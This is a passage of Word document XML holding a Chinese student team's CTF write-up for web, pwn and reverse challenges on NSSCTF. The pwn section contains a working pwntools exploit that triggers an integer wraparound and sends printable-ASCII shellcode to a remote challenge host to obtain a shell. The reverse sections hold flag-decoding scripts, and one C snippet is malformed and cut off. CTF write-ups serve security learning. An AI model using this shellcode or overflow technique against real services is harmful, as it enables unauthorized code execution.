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D24F6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基本信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419C3293" w14:textId="77777777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队伍名：心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胜于物队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0DD2C9C" w14:textId="2E88651F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队伍成员：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD4C57A" w14:textId="10051878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 祖煜（2023级）陈亮（2023级） 刘阳（2023级）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A8AF30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E0E78">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6755A46B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Sign_in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B9190DC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解题：陈亮</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6F28A7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进入网页后按f12，搜索alert，找到关键信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CE1412" w14:textId="2A73DE3B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B62AF3" wp14:editId="3A214631">
            <wp:extent cx="5274310" cy="1324288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E78">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在2107行设置断点，在控制台输入distance=1000000000运行得到flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDE8DA0" w14:textId="6A28014B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241EFC58" wp14:editId="1BC6889E">
            <wp:extent cx="4039870" cy="14179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E78">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>PWN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EC1654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Helloworld</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2321813D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解题：祖煜</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5767CA24" w14:textId="6D99323A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nc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一下进入靶机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2928C5EB" w14:textId="1C3DA31D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A741BE" w14:textId="704D7744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09EBF4" wp14:editId="64E83B45">
            <wp:extent cx="5274310" cy="175471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9DC5" w14:textId="6A85FEE8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14FE98E" wp14:editId="3BF614BA">
                <wp:extent cx="306705" cy="306705"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="40" name="矩形 40" descr="file://C:%5CUsers%5C%E7%A5%96%5CDesktop%5C6th-%E5%BF%83%E8%83%9C%E4%BA%8E%E7%89%A9%E9%98%9F-wp%E5%89%AF%E6%9C%AC%5C2024-03-09-12-26-33-image.png?msec=17099674039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3D7282" id="矩形 40" o:spid="_x0000_s1026" alt="file://C:%5CUsers%5C%E7%A5%96%5CDesktop%5C6th-%E5%BF%83%E8%83%9C%E4%BA%8E%E7%89%A9%E9%98%9F-wp%E5%89%AF%E6%9C%AC%5C2024-03-09-12-26-33-image.png?msec=1709967403962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" filled="f" stroked="f">
                <o:lock v:ext="edit" aspectratio="t"/>
                <w10:anchorlock/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2B6E7A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ls一下看到flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493A04FA" w14:textId="6976B9B6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13020B" wp14:editId="0ABF5B8E">
            <wp:extent cx="3315970" cy="2696845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CFAC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然后cat flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4574E60E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NSSCTF{f3f5bc2b-0905-4198-b1b4-92abfc600939}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AA887E" w14:textId="5737C061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90699D" wp14:editId="10DC2B53">
            <wp:extent cx="4218940" cy="526415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28B6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这是一份礼物</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407D86EA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解题：祖煜</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D19224" w14:textId="77777777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先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nc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一下进入靶机看看程序运行情况，发现程序有两个输入点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFBE374" w14:textId="40993BC8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F76576" wp14:editId="403F9DF5">
            <wp:extent cx="5274310" cy="1496913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E78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D6CAD7C" wp14:editId="5CEA7B29">
                <wp:extent cx="306705" cy="306705"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="37" name="矩形 37" descr="file://C:%5CUsers%5C%E7%A5%96%5CDesktop%5C6th-%E5%BF%83%E8%83%9C%E4%BA%8E%E7%89%A9%E9%98%9F-wp%E5%89%AF%E6%9C%AC%5C2024-03-09-13-43-04-image.png?msec=17099674039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62C3D6" id="矩形 37" o:spid="_x0000_s1026" alt="file://C:%5CUsers%5C%E7%A5%96%5CDesktop%5C6th-%E5%BF%83%E8%83%9C%E4%BA%8E%E7%89%A9%E9%98%9F-wp%E5%89%AF%E6%9C%AC%5C2024-03-09-13-43-04-image.png?msec=1709967403962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" filled="f" stroked="f">
                <o:lock v:ext="edit" aspectratio="t"/>
                <w10:anchorlock/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0051C1F8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然后使用IDA进行反汇编</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8AFEFD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先观察main函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E651D14" w14:textId="6DF46715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D485E5E" wp14:editId="3E1150CD">
                <wp:extent cx="306705" cy="306705"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="36" name="矩形 36" descr="file://C:%5CUsers%5C%E7%A5%96%5CDesktop%5C6th-%E5%BF%83%E8%83%9C%E4%BA%8E%E7%89%A9%E9%98%9F-wp%E5%89%AF%E6%9C%AC%5C2024-03-09-13-44-48-image.png?msec=17099674039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FF70EA" id="矩形 36" o:spid="_x0000_s1026" alt="file://C:%5CUsers%5C%E7%A5%96%5CDesktop%5C6th-%E5%BF%83%E8%83%9C%E4%BA%8E%E7%89%A9%E9%98%9F-wp%E5%89%AF%E6%9C%AC%5C2024-03-09-13-44-48-image.png?msec=1709967403973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AC35DF" wp14:editId="0DDAE1CE">
            <wp:extent cx="5274310" cy="3841659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8972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注意到：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BA9395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有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user_input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变量，一开始是有符号的整型，之后强制转换为无符号整型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBCABAC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进而分析出漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3712B895" w14:textId="21154F8A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然后再看 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needread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()里面的代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49992159" w14:textId="604DB858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6E1A3" wp14:editId="5A2CA3F1">
            <wp:extent cx="5274310" cy="2680783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F076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 注意到 read()函数里面a2是读取的长度，而在main函数中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user_input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传递给了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needread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()的形参a2。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F8D1E3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还注意if语句里面的v3只能是ascii的可显字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B989DF8" w14:textId="7D9A3AF9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F12F40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这可以分析出：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AE8357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user_input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强制类型转换造成的整数回绕，可以将read要读取的数变得很大，进而输入字符串，然后要输入shellcode的可显字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF17953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于是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上博客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 https://blog.csdn.net/A951860555/article/details/114106118搜索可显字符串得到：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C81B07" w14:textId="5086FD5E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F4E68" wp14:editId="0F1434D7">
            <wp:extent cx="5274310" cy="3436349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A605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exp如下:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510AFCC9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from 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pwn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 import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D90853C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p = remote('node6.anna.nssctf.cn',28855)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C541CF3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shellcode=b'Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E75B0F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p.sendline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(b"-1")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039D44EA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payload =shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43697F27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p.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413FD335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p.recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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48968281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p.interactive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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51195811" w14:textId="240799CE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对靶机进行攻击后得到权限，然后ls查看目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A44701" w14:textId="02148ECD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71D5E" wp14:editId="4789DCDE">
            <wp:extent cx="5274310" cy="3278421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6FC6" w14:textId="0EEB1834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发现flag，cat flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0C376A" w14:textId="63DFAF7A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B84A9B" wp14:editId="3F08CE3B">
            <wp:extent cx="5274310" cy="3213455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27A" w14:textId="153BD74D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A75A1B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E0E78">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>REVERSE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203871BC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CS1.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30700E6B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lastRenderedPageBreak/>
        <w:t>解题：刘阳</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C075343" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri (正文）" w:hAnsi="Calibri (正文）" w:cs="Calibri (正文）" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri (正文）" w:hAnsi="Calibri (正文）" w:cs="Calibri (正文）" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>解题：刘阳</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00121466" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri (正文）" w:hAnsi="Calibri (正文）" w:cs="Calibri (正文）" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50A5457A" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri (正文）" w:hAnsi="Calibri (正文）" w:cs="Calibri (正文）" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>解压文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="210D17C3" wp14:editId="0E55576E">
            <wp:extent cx="5270500" cy="36537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2A8B" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现是.s后缀，说明此时文件处于编译阶段，可以通过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转为.exe文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D7FA13" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用VSC打开文件发现最后有提示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的版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA1942D" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="7B07C44A" wp14:editId="740246F6">
            <wp:extent cx="5266690" cy="3127375"/>
            <wp:effectExtent l="0" t="0" r="6350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640E" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在文件所在的文件夹打开终端，输入如下指令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37114188" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E"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-c test1.s -o test1.o</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0BCD15" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> test1.o -o test1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC76DD4" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="166943C8" wp14:editId="5F59FF3C">
            <wp:extent cx="5271135" cy="3615055"/>
            <wp:effectExtent l="0" t="0" r="1905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37A2" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将.exe拖进</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查壳工具</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现没有壳</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DBFE9F" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="1AA187C0" wp14:editId="41E19A41">
            <wp:extent cx="5270500" cy="307213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D928" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>放入IDA（32位），查看主函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6E7A45" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E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06E790B9" wp14:editId="7CA7CC44">
            <wp:extent cx="18288000" cy="10868025"/>
            <wp:effectExtent l="0" t="0" r="0" b="13335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86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557F63" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>注意到特殊的函数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()，点进去查看发现与flag相关的程序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="4C543C59" wp14:editId="569BEEAF">
            <wp:extent cx="5266690" cy="3129915"/>
            <wp:effectExtent l="0" t="0" r="635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B609" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析程序，发现只要把v1的所有字符跟v3</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异或就可以得到v2，就是flag，写一个程序enc = [ 0x2A, 0x37, 0x37,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C82C2C" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x27, 0x30,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A53679A" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x22, 0x1F, 0x0C,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBA740F" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x01, 0x55,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2803399E" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x55, 0x54, 0x3B,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC637E5" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x27, 0x30,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355B0955" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x22, 0x3B, 0x10,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0081E41D" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x0C, 0x55,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1218E509" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x17, 0x3B, 0x55,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60173C19" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x17, 0x3B,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76696867" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x01, 0x1E, 0x17,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D72D5B" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x10, 0x19]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF3D24E" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD7B06F" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">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range(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(enc)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369871B5" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">flag += </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(enc[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 ^ 100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114F0F5D" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print(flag)即可得到flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E81CF6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Ez_asm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2654D06A" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题：陈亮</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECC2A42" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRPr="00484A45" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先叫ai将汇编语言转为c语言</w:t>
      </w:r>
      <w:r w:rsidRPr="00484A45">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4888B514" wp14:editId="3F97A977">
            <wp:extent cx="5274310" cy="3956685"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="111467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2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DEDA" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后根据上述代码写出逆向代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDAFF81" w14:textId="77777777" w:rsidR="00B2405E" w:rsidRPr="00484A45" w:rsidRDefault="00B2405E" w:rsidP="00B2405E">
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>int main()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t>unsigned char c[] = { 89, 69, 70, 87, 71, 86, 114, 93, 76, 99, 82, 105, 133, 85, 83, 129, 113, 70, 119, 119, 76, 93, 148, 82, 96, 139, 88, 90, 92, 138, 96, 98, 100, 139, 34 };</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t>unsigned char flag[36] = { 0 };</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t>int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= 0;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t>for (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= 0;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&lt; 35;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++)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t>c[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] -=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;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t>for (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= 0;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&lt; 35;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++) {</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t>char al = &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>apos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>;$&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>apos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>; +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;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t>if (c[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]!=al)</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t>continue;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t>else</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t>c[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] -=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;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t>for (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= 0;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&lt; 35;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++) {</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>c[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] ^= 0x17;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD471A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t>for (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= 0;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 &lt; 35; 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++) {</w:t>
      </w:r>
